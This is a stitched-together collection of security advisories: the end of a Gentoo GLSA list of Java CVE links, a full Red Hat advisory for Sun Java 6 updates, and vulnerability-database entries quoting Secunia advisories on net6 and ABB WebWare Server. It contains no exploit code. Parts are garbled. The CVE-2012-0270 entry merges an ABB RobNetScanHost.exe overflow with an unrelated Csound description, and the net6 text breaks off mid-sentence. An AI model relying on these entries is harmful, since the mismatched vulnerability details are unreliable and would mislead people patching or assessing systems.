http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5777
[ 171 ] CVE-2013-5778
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5778
[ 172 ] CVE-2013-5780
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5780
[ 173 ] CVE-2013-5782
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5782
[ 174 ] CVE-2013-5783
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5783
[ 175 ] CVE-2013-5784
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5784
[ 176 ] CVE-2013-5787
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5787
[ 177 ] CVE-2013-5788
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5788
[ 178 ] CVE-2013-5789
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5789
[ 179 ] CVE-2013-5790
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5790
[ 180 ] CVE-2013-5797
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5797
[ 181 ] CVE-2013-5800
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5800
[ 182 ] CVE-2013-5801
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5801
[ 183 ] CVE-2013-5802
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5802
[ 184 ] CVE-2013-5803
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5803
[ 185 ] CVE-2013-5804
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5804
[ 186 ] CVE-2013-5805
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5805
[ 187 ] CVE-2013-5806
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5806
[ 188 ] CVE-2013-5809
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5809
[ 189 ] CVE-2013-5810
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5810
[ 190 ] CVE-2013-5812
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5812
[ 191 ] CVE-2013-5814
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5814
[ 192 ] CVE-2013-5817
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5817
[ 193 ] CVE-2013-5818
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5818
[ 194 ] CVE-2013-5819
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5819
[ 195 ] CVE-2013-5820
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5820
[ 196 ] CVE-2013-5823
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5823
[ 197 ] CVE-2013-5824
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5824
[ 198 ] CVE-2013-5825
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5825
[ 199 ] CVE-2013-5829
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5829
[ 200 ] CVE-2013-5830
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5830
[ 201 ] CVE-2013-5831
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5831
[ 202 ] CVE-2013-5832
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5832
[ 203 ] CVE-2013-5838
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5838
[ 204 ] CVE-2013-5840
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5840
[ 205 ] CVE-2013-5842
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5842
[ 206 ] CVE-2013-5843
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5843
[ 207 ] CVE-2013-5844
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5844
[ 208 ] CVE-2013-5846
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5846
[ 209 ] CVE-2013-5848
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5848
[ 210 ] CVE-2013-5849
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5849
[ 211 ] CVE-2013-5850
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5850
[ 212 ] CVE-2013-5851
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5851
[ 213 ] CVE-2013-5852
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5852
[ 214 ] CVE-2013-5854
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5854
[ 215 ] CVE-2013-5870
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5870
[ 216 ] CVE-2013-5878
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5878
[ 217 ] CVE-2013-5887
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5887
[ 218 ] CVE-2013-5888
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5888
[ 219 ] CVE-2013-5889
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5889
[ 220 ] CVE-2013-5893
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5893
[ 221 ] CVE-2013-5895
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5895
[ 222 ] CVE-2013-5896
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5896
[ 223 ] CVE-2013-5898
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5898
[ 224 ] CVE-2013-5899
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5899
[ 225 ] CVE-2013-5902
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5902
[ 226 ] CVE-2013-5904
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5904
[ 227 ] CVE-2013-5905
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5905
[ 228 ] CVE-2013-5906
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5906
[ 229 ] CVE-2013-5907
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5907
[ 230 ] CVE-2013-5910
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5910
[ 231 ] CVE-2014-0368
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0368
[ 232 ] CVE-2014-0373
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0373
[ 233 ] CVE-2014-0375
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0375
[ 234 ] CVE-2014-0376
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0376
[ 235 ] CVE-2014-0382
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0382
[ 236 ] CVE-2014-0385
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0385
[ 237 ] CVE-2014-0387
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0387
[ 238 ] CVE-2014-0403
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0403
[ 239 ] CVE-2014-0408
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0408
[ 240 ] CVE-2014-0410
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0410
[ 241 ] CVE-2014-0411
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0411
[ 242 ] CVE-2014-0415
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0415
[ 243 ] CVE-2014-0416
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0416
[ 244 ] CVE-2014-0417
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0417
[ 245 ] CVE-2014-0418
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0418
[ 246 ] CVE-2014-0422
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0422
[ 247 ] CVE-2014-0423
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0423
[ 248 ] CVE-2014-0424
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0424
[ 249 ] CVE-2014-0428
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0428
Availability
============
This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:
http://security.gentoo.org/glsa/glsa-201401-30.xml
Concerns?
=========
Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
security@gentoo.org or alternatively, you may file a bug at
https://bugs.gentoo.org.
License
=======
Copyright 2014 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).
The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.
http://creativecommons.org/licenses/by-sa/2.5
. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
=====================================================================
Red Hat Security Advisory
Synopsis: Critical: java-1.6.0-sun security update
Advisory ID: RHSA-2012:0139-01
Product: Red Hat Enterprise Linux Extras
Advisory URL: https://rhn.redhat.com/errata/RHSA-2012-0139.html
Issue date: 2012-02-16
CVE Names: CVE-2011-3563 CVE-2011-3571 CVE-2011-5035
CVE-2012-0498 CVE-2012-0499 CVE-2012-0500
CVE-2012-0501 CVE-2012-0502 CVE-2012-0503
CVE-2012-0505 CVE-2012-0506
=====================================================================
1. Summary:
Updated java-1.6.0-sun packages that fix several security issues are now
available for Red Hat Enterprise Linux 4 Extras, and Red Hat Enterprise
Linux 5 and 6 Supplementary.
The Red Hat Security Response Team has rated this update as having critical
security impact. Common Vulnerability Scoring System (CVSS) base scores,
which give detailed severity ratings, are available for each vulnerability
from the CVE links in the References section.
2. Relevant releases/architectures:
Red Hat Desktop version 4 Extras - i386, x86_64
Red Hat Enterprise Linux AS version 4 Extras - i386, x86_64
Red Hat Enterprise Linux Desktop Supplementary (v. 5) - i386, x86_64
Red Hat Enterprise Linux Desktop Supplementary (v. 6) - i386, x86_64
Red Hat Enterprise Linux ES version 4 Extras - i386, x86_64
Red Hat Enterprise Linux HPC Node Supplementary (v. 6) - x86_64
Red Hat Enterprise Linux Server Supplementary (v. 5) - i386, x86_64
Red Hat Enterprise Linux Server Supplementary (v. 6) - i386, x86_64
Red Hat Enterprise Linux WS version 4 Extras - i386, x86_64
Red Hat Enterprise Linux Workstation Supplementary (v. 6) - i386, x86_64
3. Description:
The Sun 1.6.0 Java release includes the Sun Java 6 Runtime Environment and
the Sun Java 6 Software Development Kit.
This update fixes several vulnerabilities in the Sun Java 6 Runtime
Environment and the Sun Java 6 Software Development Kit. Further
information about these flaws can be found on the Oracle Java SE Critical
Patch page, listed in the References section. (CVE-2011-3563,
CVE-2011-3571, CVE-2011-5035, CVE-2012-0498, CVE-2012-0499, CVE-2012-0500,
CVE-2012-0501, CVE-2012-0502, CVE-2012-0503, CVE-2012-0505, CVE-2012-0506)
All users of java-1.6.0-sun are advised to upgrade to these updated
packages, which provide JDK and JRE 6 Update 31 and resolve these issues.
All running instances of Sun Java must be restarted for the update to take
effect.
4. Solution:
Before applying this update, make sure all previously-released errata
relevant to your system have been applied.
This update is available via the Red Hat Network. Details on how to
use the Red Hat Network to apply this update are available at
https://access.redhat.com/kb/docs/DOC-11259
5. Bugs fixed (http://bugzilla.redhat.com/):
788606 - CVE-2011-5035 OpenJDK: HttpServer no header count limit (Lightweight HTTP Server, 7126960)
788624 - CVE-2012-0501 OpenJDK: off-by-one bug in ZIP reading code (JRE, 7118283)
788976 - CVE-2012-0503 OpenJDK: unrestricted use of TimeZone.setDefault() (i18n, 7110687)
788994 - CVE-2011-3571 OpenJDK: AtomicReferenceArray insufficient array type check (Concurrency, 7082299)
789295 - CVE-2011-3563 OpenJDK: JavaSound incorrect bounds check (Sound, 7088367)
789297 - CVE-2012-0502 OpenJDK: KeyboardFocusManager focus stealing (AWT, 7110683)
789299 - CVE-2012-0505 OpenJDK: incomplete info in the deserialization exception (Serialization, 7110700)
789300 - CVE-2012-0506 OpenJDK: mutable repository identifiers (CORBA, 7110704)
790720 - CVE-2012-0498 Oracle JDK: unspecified vulnerability fixed in 6u31 and 7u3 (2D)
790722 - CVE-2012-0499 Oracle JDK: unspecified vulnerability fixed in 6u31 and 7u3 (2D)
790724 - CVE-2012-0500 Oracle JDK: unspecified vulnerability fixed in 6u31 and 7u3 (Deployment)
6. Package List:
Red Hat Enterprise Linux AS version 4 Extras:
i386:
java-1.6.0-sun-1.6.0.31-1jpp.1.el4.i586.rpm
java-1.6.0-sun-demo-1.6.0.31-1jpp.1.el4.i586.rpm
java-1.6.0-sun-devel-1.6.0.31-1jpp.1.el4.i586.rpm
java-1.6.0-sun-jdbc-1.6.0.31-1jpp.1.el4.i586.rpm
java-1.6.0-sun-plugin-1.6.0.31-1jpp.1.el4.i586.rpm
java-1.6.0-sun-src-1.6.0.31-1jpp.1.el4.i586.rpm
x86_64:
java-1.6.0-sun-1.6.0.31-1jpp.1.el4.x86_64.rpm
java-1.6.0-sun-demo-1.6.0.31-1jpp.1.el4.x86_64.rpm
java-1.6.0-sun-devel-1.6.0.31-1jpp.1.el4.x86_64.rpm
java-1.6.0-sun-jdbc-1.6.0.31-1jpp.1.el4.x86_64.rpm
java-1.6.0-sun-plugin-1.6.0.31-1jpp.1.el4.x86_64.rpm
java-1.6.0-sun-src-1.6.0.31-1jpp.1.el4.x86_64.rpm
Red Hat Desktop version 4 Extras:
i386:
java-1.6.0-sun-1.6.0.31-1jpp.1.el4.i586.rpm
java-1.6.0-sun-demo-1.6.0.31-1jpp.1.el4.i586.rpm
java-1.6.0-sun-devel-1.6.0.31-1jpp.1.el4.i586.rpm
java-1.6.0-sun-jdbc-1.6.0.31-1jpp.1.el4.i586.rpm
java-1.6.0-sun-plugin-1.6.0.31-1jpp.1.el4.i586.rpm
java-1.6.0-sun-src-1.6.0.31-1jpp.1.el4.i586.rpm
x86_64:
java-1.6.0-sun-1.6.0.31-1jpp.1.el4.x86_64.rpm
java-1.6.0-sun-demo-1.6.0.31-1jpp.1.el4.x86_64.rpm
java-1.6.0-sun-devel-1.6.0.31-1jpp.1.el4.x86_64.rpm
java-1.6.0-sun-jdbc-1.6.0.31-1jpp.1.el4.x86_64.rpm
java-1.6.0-sun-plugin-1.6.0.31-1jpp.1.el4.x86_64.rpm
java-1.6.0-sun-src-1.6.0.31-1jpp.1.el4.x86_64.rpm
Red Hat Enterprise Linux ES version 4 Extras:
i386:
java-1.6.0-sun-1.6.0.31-1jpp.1.el4.i586.rpm
java-1.6.0-sun-demo-1.6.0.31-1jpp.1.el4.i586.rpm
java-1.6.0-sun-devel-1.6.0.31-1jpp.1.el4.i586.rpm
java-1.6.0-sun-jdbc-1.6.0.31-1jpp.1.el4.i586.rpm
java-1.6.0-sun-plugin-1.6.0.31-1jpp.1.el4.i586.rpm
java-1.6.0-sun-src-1.6.0.31-1jpp.1.el4.i586.rpm
x86_64:
java-1.6.0-sun-1.6.0.31-1jpp.1.el4.x86_64.rpm
java-1.6.0-sun-demo-1.6.0.31-1jpp.1.el4.x86_64.rpm
java-1.6.0-sun-devel-1.6.0.31-1jpp.1.el4.x86_64.rpm
java-1.6.0-sun-jdbc-1.6.0.31-1jpp.1.el4.x86_64.rpm
java-1.6.0-sun-plugin-1.6.0.31-1jpp.1.el4.x86_64.rpm
java-1.6.0-sun-src-1.6.0.31-1jpp.1.el4.x86_64.rpm
Red Hat Enterprise Linux WS version 4 Extras:
i386:
java-1.6.0-sun-1.6.0.31-1jpp.1.el4.i586.rpm
java-1.6.0-sun-demo-1.6.0.31-1jpp.1.el4.i586.rpm
java-1.6.0-sun-devel-1.6.0.31-1jpp.1.el4.i586.rpm
java-1.6.0-sun-jdbc-1.6.0.31-1jpp.1.el4.i586.rpm
java-1.6.0-sun-plugin-1.6.0.31-1jpp.1.el4.i586.rpm
java-1.6.0-sun-src-1.6.0.31-1jpp.1.el4.i586.rpm
x86_64:
java-1.6.0-sun-1.6.0.31-1jpp.1.el4.x86_64.rpm
java-1.6.0-sun-demo-1.6.0.31-1jpp.1.el4.x86_64.rpm
java-1.6.0-sun-devel-1.6.0.31-1jpp.1.el4.x86_64.rpm
java-1.6.0-sun-jdbc-1.6.0.31-1jpp.1.el4.x86_64.rpm
java-1.6.0-sun-plugin-1.6.0.31-1jpp.1.el4.x86_64.rpm
java-1.6.0-sun-src-1.6.0.31-1jpp.1.el4.x86_64.rpm
Red Hat Enterprise Linux Desktop Supplementary (v. 5):
i386:
java-1.6.0-sun-1.6.0.31-1jpp.1.el5.i586.rpm
java-1.6.0-sun-demo-1.6.0.31-1jpp.1.el5.i586.rpm
java-1.6.0-sun-devel-1.6.0.31-1jpp.1.el5.i586.rpm
java-1.6.0-sun-jdbc-1.6.0.31-1jpp.1.el5.i586.rpm
java-1.6.0-sun-plugin-1.6.0.31-1jpp.1.el5.i586.rpm
java-1.6.0-sun-src-1.6.0.31-1jpp.1.el5.i586.rpm
x86_64:
java-1.6.0-sun-1.6.0.31-1jpp.1.el5.x86_64.rpm
java-1.6.0-sun-demo-1.6.0.31-1jpp.1.el5.x86_64.rpm
java-1.6.0-sun-devel-1.6.0.31-1jpp.1.el5.x86_64.rpm
java-1.6.0-sun-jdbc-1.6.0.31-1jpp.1.el5.x86_64.rpm
java-1.6.0-sun-plugin-1.6.0.31-1jpp.1.el5.x86_64.rpm
java-1.6.0-sun-src-1.6.0.31-1jpp.1.el5.x86_64.rpm
Red Hat Enterprise Linux Server Supplementary (v. 5):
i386:
java-1.6.0-sun-1.6.0.31-1jpp.1.el5.i586.rpm
java-1.6.0-sun-demo-1.6.0.31-1jpp.1.el5.i586.rpm
java-1.6.0-sun-devel-1.6.0.31-1jpp.1.el5.i586.rpm
java-1.6.0-sun-jdbc-1.6.0.31-1jpp.1.el5.i586.rpm
java-1.6.0-sun-plugin-1.6.0.31-1jpp.1.el5.i586.rpm
java-1.6.0-sun-src-1.6.0.31-1jpp.1.el5.i586.rpm
x86_64:
java-1.6.0-sun-1.6.0.31-1jpp.1.el5.x86_64.rpm
java-1.6.0-sun-demo-1.6.0.31-1jpp.1.el5.x86_64.rpm
java-1.6.0-sun-devel-1.6.0.31-1jpp.1.el5.x86_64.rpm
java-1.6.0-sun-jdbc-1.6.0.31-1jpp.1.el5.x86_64.rpm
java-1.6.0-sun-plugin-1.6.0.31-1jpp.1.el5.x86_64.rpm
java-1.6.0-sun-src-1.6.0.31-1jpp.1.el5.x86_64.rpm
Red Hat Enterprise Linux Desktop Supplementary (v. 6):
i386:
java-1.6.0-sun-1.6.0.31-1jpp.1.el6_2.i686.rpm
java-1.6.0-sun-demo-1.6.0.31-1jpp.1.el6_2.i686.rpm
java-1.6.0-sun-devel-1.6.0.31-1jpp.1.el6_2.i686.rpm
java-1.6.0-sun-jdbc-1.6.0.31-1jpp.1.el6_2.i686.rpm
java-1.6.0-sun-plugin-1.6.0.31-1jpp.1.el6_2.i686.rpm
java-1.6.0-sun-src-1.6.0.31-1jpp.1.el6_2.i686.rpm
x86_64:
java-1.6.0-sun-1.6.0.31-1jpp.1.el6_2.i686.rpm
java-1.6.0-sun-1.6.0.31-1jpp.1.el6_2.x86_64.rpm
java-1.6.0-sun-demo-1.6.0.31-1jpp.1.el6_2.x86_64.rpm
java-1.6.0-sun-devel-1.6.0.31-1jpp.1.el6_2.i686.rpm
java-1.6.0-sun-devel-1.6.0.31-1jpp.1.el6_2.x86_64.rpm
java-1.6.0-sun-jdbc-1.6.0.31-1jpp.1.el6_2.x86_64.rpm
java-1.6.0-sun-plugin-1.6.0.31-1jpp.1.el6_2.x86_64.rpm
java-1.6.0-sun-src-1.6.0.31-1jpp.1.el6_2.x86_64.rpm
Red Hat Enterprise Linux HPC Node Supplementary (v. 6):
x86_64:
java-1.6.0-sun-1.6.0.31-1jpp.1.el6_2.i686.rpm
java-1.6.0-sun-1.6.0.31-1jpp.1.el6_2.x86_64.rpm
java-1.6.0-sun-demo-1.6.0.31-1jpp.1.el6_2.x86_64.rpm
java-1.6.0-sun-devel-1.6.0.31-1jpp.1.el6_2.i686.rpm
java-1.6.0-sun-devel-1.6.0.31-1jpp.1.el6_2.x86_64.rpm
java-1.6.0-sun-src-1.6.0.31-1jpp.1.el6_2.x86_64.rpm
Red Hat Enterprise Linux Server Supplementary (v. 6):
i386:
java-1.6.0-sun-1.6.0.31-1jpp.1.el6_2.i686.rpm
java-1.6.0-sun-demo-1.6.0.31-1jpp.1.el6_2.i686.rpm
java-1.6.0-sun-devel-1.6.0.31-1jpp.1.el6_2.i686.rpm
java-1.6.0-sun-jdbc-1.6.0.31-1jpp.1.el6_2.i686.rpm
java-1.6.0-sun-plugin-1.6.0.31-1jpp.1.el6_2.i686.rpm
java-1.6.0-sun-src-1.6.0.31-1jpp.1.el6_2.i686.rpm
x86_64:
java-1.6.0-sun-1.6.0.31-1jpp.1.el6_2.i686.rpm
java-1.6.0-sun-1.6.0.31-1jpp.1.el6_2.x86_64.rpm
java-1.6.0-sun-demo-1.6.0.31-1jpp.1.el6_2.x86_64.rpm
java-1.6.0-sun-devel-1.6.0.31-1jpp.1.el6_2.i686.rpm
java-1.6.0-sun-devel-1.6.0.31-1jpp.1.el6_2.x86_64.rpm
java-1.6.0-sun-jdbc-1.6.0.31-1jpp.1.el6_2.x86_64.rpm
java-1.6.0-sun-plugin-1.6.0.31-1jpp.1.el6_2.x86_64.rpm
java-1.6.0-sun-src-1.6.0.31-1jpp.1.el6_2.x86_64.rpm
Red Hat Enterprise Linux Workstation Supplementary (v. 6):
i386:
java-1.6.0-sun-1.6.0.31-1jpp.1.el6_2.i686.rpm
java-1.6.0-sun-demo-1.6.0.31-1jpp.1.el6_2.i686.rpm
java-1.6.0-sun-devel-1.6.0.31-1jpp.1.el6_2.i686.rpm
java-1.6.0-sun-jdbc-1.6.0.31-1jpp.1.el6_2.i686.rpm
java-1.6.0-sun-plugin-1.6.0.31-1jpp.1.el6_2.i686.rpm
java-1.6.0-sun-src-1.6.0.31-1jpp.1.el6_2.i686.rpm
x86_64:
java-1.6.0-sun-1.6.0.31-1jpp.1.el6_2.i686.rpm
java-1.6.0-sun-1.6.0.31-1jpp.1.el6_2.x86_64.rpm
java-1.6.0-sun-demo-1.6.0.31-1jpp.1.el6_2.x86_64.rpm
java-1.6.0-sun-devel-1.6.0.31-1jpp.1.el6_2.i686.rpm
java-1.6.0-sun-devel-1.6.0.31-1jpp.1.el6_2.x86_64.rpm
java-1.6.0-sun-jdbc-1.6.0.31-1jpp.1.el6_2.x86_64.rpm
java-1.6.0-sun-plugin-1.6.0.31-1jpp.1.el6_2.x86_64.rpm
java-1.6.0-sun-src-1.6.0.31-1jpp.1.el6_2.x86_64.rpm
These packages are GPG signed by Red Hat for security. Our key and
details on how to verify the signature are available from
https://access.redhat.com/security/team/key/#package
7. References:
https://www.redhat.com/security/data/cve/CVE-2011-3563.html
https://www.redhat.com/security/data/cve/CVE-2011-3571.html
https://www.redhat.com/security/data/cve/CVE-2011-5035.html
https://www.redhat.com/security/data/cve/CVE-2012-0498.html
https://www.redhat.com/security/data/cve/CVE-2012-0499.html
https://www.redhat.com/security/data/cve/CVE-2012-0500.html
https://www.redhat.com/security/data/cve/CVE-2012-0501.html
https://www.redhat.com/security/data/cve/CVE-2012-0502.html
https://www.redhat.com/security/data/cve/CVE-2012-0503.html
https://www.redhat.com/security/data/cve/CVE-2012-0505.html
https://www.redhat.com/security/data/cve/CVE-2012-0506.html
https://access.redhat.com/security/updates/classification/#critical
http://www.oracle.com/technetwork/topics/security/javacpufeb2012-366318.html
http://www.oracle.com/technetwork/java/javase/6u31-relnotes-1482342.html
8. Contact:
The Red Hat security contact is <secalert@redhat.com>. More contact
details at https://access.redhat.com/security/team/contact/
Copyright 2012 Red Hat, Inc.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.4 (GNU/Linux)
iD8DBQFPPVa5XlSAg2UNWIIRAn6xAJ932rg7KVwp+jyL7jwxMvOiZHAqtQCgmt4n
dZEXYZPhMUvix7Sd5jUeKng=
=Czkl
-----END PGP SIGNATURE-----
--
RHSA-announce mailing list
RHSA-announce@redhat.com
https://www.redhat.com/mailman/listinfo/rhsa-announce
VAR-201402-0040 | CVE-2011-4093 | libnet6 of inc/server.hpp Integer overflow vulnerability |
CVSS V2: 5.8 CVSS V3: - Severity: MEDIUM |
Integer overflow in inc/server.hpp in libnet6 (aka net6) before 1.3.14 might allow remote attackers to hijack connections and gain privileges as other users by making a large number of connections until the overflow occurs and an ID of another user is provided. Net6 is a simple network library. Net6 has an internal ID count overflow error that can be exploited to hijack other user sessions. net6 is prone to a session-hijacking vulnerability and an information-disclosure vulnerability.
An attacker can exploit these vulnerabilities to obtain sensitive information, or possibly perform actions with elevated privileges.
net6 1.3.13 is vulnerable; other versions may also be affected.
For more information:
SA46605
SOLUTION:
Apply updated packages via the yum utility ("yum update net6"). ----------------------------------------------------------------------
Ovum says ad hoc tools are out-dated. The best practice approach?
Fast vulnerability intelligence, threat handling, and setup in one tool.
Read the new report on the Secunia VIM:
http://secunia.com/products/corporate/vim/ovum_2011_request/
----------------------------------------------------------------------
TITLE:
net6 Two Weaknesses
SECUNIA ADVISORY ID:
SA46605
VERIFY ADVISORY:
Secunia.com
http://secunia.com/advisories/46605/
Customer Area (Credentials Required)
https://ca.secunia.com/?page=viewadvisory&vuln_id=46605
RELEASE DATE:
2011-10-31
DISCUSS ADVISORY:
http://secunia.com/advisories/46605/#comments
AVAILABLE ON SITE AND IN CUSTOMER AREA:
* Last Update
* Popularity
* Comments
* Criticality Level
* Impact
* Where
* Solution Status
* Operating System / Software
* CVE Reference(s)
http://secunia.com/advisories/46605/
ONLY AVAILABLE IN CUSTOMER AREA:
* Authentication Level
* Report Reliability
* Secunia PoC
* Secunia Analysis
* Systems Affected
* Approve Distribution
* Remediation Status
* Secunia CVSS Score
* CVSS
https://ca.secunia.com/?page=viewadvisory&vuln_id=46605
ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI:
* AUTOMATED SCANNING
http://secunia.com/vulnerability_scanning/personal/
http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/
DESCRIPTION:
Vasiliy Kulikov has reported two weaknesses in net6, which can be
exploited by malicious people to disclose certain information and
conduct session hijacking attacks.
1) The library may perform certain actions prior to validating the
authentication of a connecting user, which can be exploited to e.g.
disclose certain information about already connected users. hijack another user's session.
The weaknesses are reported in version 1.3.13.
SOLUTION:
Fixed in the GIT repository.
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
PROVIDED AND/OR DISCOVERED BY:
Vasiliy Kulikov
ORIGINAL ADVISORY:
http://www.openwall.com/lists/oss-security/2011/10/30/3
OTHER REFERENCES:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
DEEP LINKS:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXTENDED DESCRIPTION:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXTENDED SOLUTION:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXPLOIT:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
private users keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/advisories/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
.
1) An error in the net6 library can be exploited to e.g.
For more information see weakness #2 in:
SA46605
SOLUTION:
Restrict access to trusted hosts only
VAR-201402-0033 | CVE-2012-0270 | ABB WebWare Server 'RobNetScanHost.exe' Buffer Overflow Vulnerability |
CVSS V2: 7.5 CVSS V3: - Severity: HIGH |
Multiple stack-based buffer overflows in Csound before 5.16.6 allow remote attackers to execute arbitrary code via a crafted (1) hetro file to the getnum function in util/heti_main.c or (2) PVOC file to the getnum function in util/pv_import.c. Authentication is not required to exploit this vulnerability. The specific flaw exists within RobNetScanHost.exe and its parsing of network packets accepted on port 5512. The parsing of 'Netscan' packets with opcodes 0xE and 0xA are vulnerable to a stack-based buffer overflow with a fixed allocation of 20 bytes. This vulnerability can be exploited to execute arbitrary code in the context of the service process (LocalSystem). ABB WebWare Server is a software product used primarily for production data control. RobNetScanHost.exe provided by ABB WebWare Server has security flaws. Csound is prone to multiple buffer-overflow vulnerabilities because it fails to properly bounds check user-supplied data. Failed attacks will cause denial-of-service conditions.
Csound 5.13.0 is vulnerable; other versions may also be affected. ----------------------------------------------------------------------
Secunia presentations @ RSA Conference 2012, San Francisco, USA, 27 Feb-02 March
Listen to our Chief Security Specialist, Research Analyst Director, and Director Product Management & Quality Assurance discuss the industry's key topics. Also, visit the Secunia stand #817. Find out more: http://www.rsaconference.com/events/2012/usa/index.htm
----------------------------------------------------------------------
TITLE:
ABB Multiple Products RobNetScanHost.exe Buffer Overflow
Vulnerability
SECUNIA ADVISORY ID:
SA48090
VERIFY ADVISORY:
Secunia.com
http://secunia.com/advisories/48090/
Customer Area (Credentials Required)
https://ca.secunia.com/?page=viewadvisory&vuln_id=48090
RELEASE DATE:
2012-02-23
DISCUSS ADVISORY:
http://secunia.com/advisories/48090/#comments
AVAILABLE ON SITE AND IN CUSTOMER AREA:
* Last Update
* Popularity
* Comments
* Criticality Level
* Impact
* Where
* Solution Status
* Operating System / Software
* CVE Reference(s)
http://secunia.com/advisories/48090/
ONLY AVAILABLE IN CUSTOMER AREA:
* Authentication Level
* Report Reliability
* Secunia PoC
* Secunia Analysis
* Systems Affected
* Approve Distribution
* Remediation Status
* Secunia CVSS Score
* CVSS
